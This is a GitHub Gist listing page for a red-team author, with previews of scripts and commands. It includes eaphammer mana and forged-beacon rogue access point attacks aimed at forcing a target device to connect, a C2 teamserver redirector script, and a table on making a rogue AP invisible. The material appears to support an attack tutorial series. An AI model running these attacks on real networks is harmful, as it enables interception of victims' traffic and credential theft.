Sølst1c3 s0lst1c3
s0lst1c3
/ hostapd_macsec_params
Created
July 9, 2020 01:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Source: https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf | |
| ##### IEEE 802.1X-2004 related configuration ################################## | |
| # Require IEEE 802.1X authorization | |
| #ieee8021x=1 | |
| # IEEE 802.1X/EAPOL version | |
| # hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL | |
| # version 2. However, there are many client implementations that do not handle |
s0lst1c3
/ redir-create.sh
Created
April 25, 2020 20:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Name: redir-create.sh | |
| # Author: @s0lst1c3 | |
| # Description: Simple Bash script that creates a mod_rewrite redirector | |
| # using Joe Vest's cs2modrewrite tool. | |
| # Syntax: ./redir-create.sh <profile path> <teamserver url> <decoy url> <redirector ip> <ssh user> <domain> | |
| #!/bin/bash | |
| apache_default_ssl_conf="/etc/apache2/sites-enabled/default-ssl.conf" | |
| apache_conf="/etc/apache2/apache2.conf" |
s0lst1c3
/ extract_ssids.py
Created
April 1, 2020 17:23
Quick hacky script for extracting SSIDs from a set of airodump-ng CSV files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import glob | |
| all_ssids = set([]) | |
| for input_file in glob.glob('*.csv'): | |
| with open(input_file) as fd: | |
| for line in fd: | |
| if line.split(',')[0] == 'BSSID': | |
| continue | |
| if line.split(',')[0] == 'Station MAC': | |
| break | |
| line_len = len(line.split(',')) |
s0lst1c3
/ build-wireshark-dev.py
Created
November 12, 2019 07:35
Automates the build process for Wireshark 3.1.X (dev) on Kali
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Name: build-wireshark-dev.py | |
| # Author: @s0lst1c3 | |
| # Email: [email protected] | |
| # Description: Automates the build process for Wireshark 3.1.X (dev) on Kali | |
| # Last tested: Nov 12 2019 | |
| import os | |
| import shutil |
s0lst1c3
/ forge-beacon-bursts-4.sh
Created
November 4, 2019 06:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect | |
| ./forge-beacons -i wlan1 \ | |
| --bssid de:ad:be:ef:13:37 \ | |
| --known-essids-file ssid-whitelist.txt \ | |
| --dst-addr 11:22:33:11:22:33 \ | |
| --burst-count 5 |
s0lst1c3
/ forge-beacon-bursts-3.sh
Created
November 4, 2019 06:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # execute a mana attack but only respond to ESSIDs in whitelist | |
| ./eaphammer -i wlan0 \ | |
| --bssid de:ad:be:ef:13:37 \ | |
| --mana \ | |
| -e bananas \ | |
| --ssid-whitelist ssid-whitelist.txt \ | |
| --mac-whitelist mac-whitelist.txt \ | |
| --known-beacons \ | |
| --captive-portal |
s0lst1c3
/ forge-beacon-bursts-2.sh
Created
November 4, 2019 06:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # create mac address whitelist containing the mac address of our target station (another spoiler) | |
| echo '11:22:33:11:22:33' > mac-whitelist.txt |
s0lst1c3
/ forge-beacon-bursts-1.sh
Last active
November 4, 2019 06:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # create an ESSID whitelist file (this is a spoiler for Part III of this series) | |
| for ssid in "apples" "oranges" "grapes" "pears"; do | |
| echo $ssid >> ssid-whitelist.txt; | |
| done |
s0lst1c3
/ MFACL-Table.csv
Created
October 22, 2019 07:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MFACL Type | MFACL Mode | Effect | |
|---|---|---|---|
| MAC-based | whitelist | the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist | |
| MAC-based | blacklist | the rogue AP will ignore probe requests from specific devices making it invisible to any device not in the blacklist | |
| SSID-based | whitelist | the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist | |
| SSID-based | blacklist | the rogue AP will ignore probe requests for specific ESSIDs |
s0lst1c3
/ MFACL-Table.csv
Created
October 22, 2019 07:54
We can make this file beautiful and searchable if this error is corrected: It looks like row 3 should actually have 3 columns, instead of 4 in line 2.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MFACL Type,MFACL Mode,Effect | |
| MAC-based,whitelist,the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist | |
| MAC-based,blacklist,the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist | |
| SSID-based,whitelist,the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist | |
| SSID-based,blacklist,the rogue AP will ignore probe requests for specific ESSIDs |
NewerOlder